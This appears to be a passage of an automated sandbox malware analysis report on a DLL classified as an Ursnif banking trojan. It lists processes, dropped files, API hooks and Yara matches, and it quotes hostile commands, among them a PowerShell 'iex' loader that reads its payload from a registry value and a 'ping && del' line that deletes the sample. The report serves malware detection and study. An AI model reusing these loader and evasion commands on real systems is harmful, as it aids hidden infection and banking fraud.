                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@54/38@14/8
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B04A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{9C6EB822-4BB9-2E3E-B590-AF42B9C45396}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{6032BFB6-3FC2-92EA-C994-E3E60D08C77A}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
                      Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: uT9rwkGATJ.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: uT9rwkGATJ.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
                      Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
                      Source: uT9rwkGATJ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: uT9rwkGATJ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: uT9rwkGATJ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: uT9rwkGATJ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: uT9rwkGATJ.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      barindex
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A21A3 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A2150 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0ABE0 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B0AF13 push ecx; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00670B91 push edi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B56106 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00B7A283 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00570B91 push edi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02DA0B91 push edi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0336A283 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03346106 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BDABE0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02BDAF13 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00840B91 push edi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,
                      Source: hiiw3gsl.dll.31.drStatic PE information: real checksum: 0x0 should be: 0x20ab
                      Source: uio4qdnj.dll.29.drStatic PE information: real checksum: 0x0 should be: 0x7dd1
                      Source: uT9rwkGATJ.dllStatic PE information: real checksum: 0xa274a should be: 0xa6bea
                      Source: ebytp2em.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x85fb
                      Source: hjljqxud.dll.32.drStatic PE information: real checksum: 0x0 should be: 0xb2f3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ebytp2em.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uio4qdnj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hjljqxud.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Self deletion via cmd deleteShow sources
                      Source: C:\Windows\explorer.exeProcess created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exeProcess created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exeProcess created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Source: C:\Windows\explorer.exeProcess created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
